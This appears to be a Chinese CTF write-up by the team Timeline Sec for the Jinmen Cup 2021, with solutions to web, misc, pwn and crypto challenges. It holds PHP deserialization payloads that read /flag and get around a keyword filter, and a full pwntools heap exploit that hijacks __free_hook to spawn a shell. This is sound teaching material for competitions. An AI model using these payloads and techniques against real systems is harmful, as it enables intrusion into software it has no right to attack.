津门杯2021 部分WriteUp
津门杯2021 部分WriteUp
Timeline Sec
发布于 2021-06-25 11:35:41
发布于 2021-06-25 11:35:41
津门杯
Web
★power_cut | solved by HACHp1
扫描器扫到/.index.php.swp,用vim -r恢复
一个简单的反序列化,过滤了flag:
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
...
}
$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);
```
```
<?php
class weblog {
public $weblogfile='/flag';
}
$a=new weblog();
echo (serialize($a));使用S字符串绕过:
O:6:"weblog":1:{s:10:"weblogfile";S:5:"\2f\66\6c\61\67";}flag{EfuteB3QOqvRqD099mHuDRJKWRxnAC47}★power_cut | solved by xboy
双写绕过:
O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}Misc
★m1bmp | solved by 0xK4ws
stegsolve一把梭
ZmxhZ3tsNURHcUYxcFB6T2IyTFU5MTlMTWFCWVM1QjFHMDFGRH0=
base64decode一下:
flag{l5DGqF1pPzOb2LU919LMaBYS5B1G01FD}
★m0usb | solved by thestar
usb流量分析,tshark命令提取数据
tshark -r 12.pcapng -T fields -e usb.capdata > usbdata.txt还原 tshark 提取的数据到键盘映射
得到:884080810882108108821042084010421只有01248这几个数字,云影密码的特征
解密得到:THISISFLAG
flag{THISISFLAG}
PWN
★easypwn | solved by Y1fan
bss段上存在溢出,可以修改结构体:
通过溢出覆盖已释放chunk的结构体的name字段,实现通过show()的check,泄露出libc地址
然后再次通过溢出,篡改bss上的堆地址为__free_hook的地址,然后通过edit()将其修改为system即可
EXP:
#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./hello"
reomote_addr=["",]
elf = ELF(pc)
libc = ELF("./libc-2.23.so")
ld_so=""
context.binary=pc
context.terminal=["gnome-terminal",'-x','sh','-c']
if len(sys.argv)==1:
p=process(pc)
context.log_level="debug"
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00'))
rv6 = lambda : u64(rv(6)+'\x00'*2)
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def bp(bkp=0,other=''):
if bkp==0:
cmd=''
elif bkp<=0x7fff:
cmd = "b *$rebase("+str(bkp)+")"
else:
cmd="b *"+str(bkp)
cmd+=other
attach(p,cmd)
what_choice="your choice>>"
ch_add="1"
ch_dele="2"
ch_edit="4"
ch_show="3"
what_size="input des size:"
what_c="des info:"
what_idx="input index:"
def add(size,c='a',number=1,name='lmj'):
ru(what_choice)
sl(ch_add)
ru("phone number:")
sl(str(number))
ru("name:")
sl(str(name))
ru(what_size)
sl(str(size))
ru(what_c)
sl(c)
def dele(idx):
ru(what_choice)
sl(ch_dele)
ru(what_idx)
sl(str(idx))
def edit1(idx,c='a',number=1,name='lmj'):
ru(what_choice)
sl(ch_edit)
ru(what_idx)
sl(str(idx))
ru("phone number:")
sl(str(number))
ru("name:")
sl(str(name))
ru(what_c)
sl(c)
def edit2(idx,number=1,name='lmj'):
ru(what_choice)
sl(ch_edit)
ru(what_idx)
sl(str(idx))
ru("phone number:")
sl(str(number))
ru("name:")
sl(str(name))
def show(idx):
ru(what_choice)
sl(ch_show)
ru(what_idx)
sl(str(idx))
add(0x10)
add(0x80)
add(0x78)
dele(1)
edit2(0,1,'a'*(13+8+8+4))
# bp(0x1188)
show(1)
ru("des:")
main_arena=ru7f()
libc_base=main_arena-0x3c4b78
free_hook=libc_base+libc.sym['__free_hook']
sys_addr=libc_base+libc.sym['system']
edit2(0,1,'a'*(13+8*4*2)+p64(free_hook))
edit1(2,p64(sys_addr))
add(0x10,'/bin/sh\x00')
dele(3)
# lg("libc_base",libc_base)Crypto
★混合编码 | solved by 0xK4ws
base64decode之后去掉%2F ascii转字符
flag{q1xKpm8vILWrkmXxV6j11MdcGtLzvRyV}
★RSA|solved by xboy
小李截获一个RSA加密信息,能帮忙解开吗?c=58703794202217708947284241025731347400180247075968200121227051434588274043273799724484183411072837136505848853313100468119277511144235171654313035776616454960333999039452491921144841080778960041199884823368775400603713982137807991048133794452060951251851183850000091036462977949122345066992308292574341196418
e=119393861845960762048898683511487799317851579948448252137466961581627352921253771151013287722073113635185303441785456596647011121862839187775715967164165508224247084850825422778997956746102517068390036859477146822952441831345548850161988935112627527366840944972449468661697184646139623527967901314485800416727
n=143197135363873763765271313889482832065495214476988244056602939316096558604072987605784826977177132590941852043292009336108553058140643889603639640376907419560005800390316898478577088950660088975625569277320455499051275696998681590010122458979436183639691126624402025651761740265817600604313205276368201637427看起来e很大,尝试 wiener attack
脚本:
https://github.com/pablocelayes/rsa-wiener-attack
得到d
d=1357235344673103496180998879094975443560606119995553415369479
print(libnum.n2s(pow(c,d,n)))flag{ZTAtG3hjH2zpcoB5}我们欢迎每一个对技术充满热情的同学
如果你和我们一样,想做出点成绩
这里给你无限的空间,任你翱翔
进组方式,简历投递邮箱736241063@qq.com
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-17,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录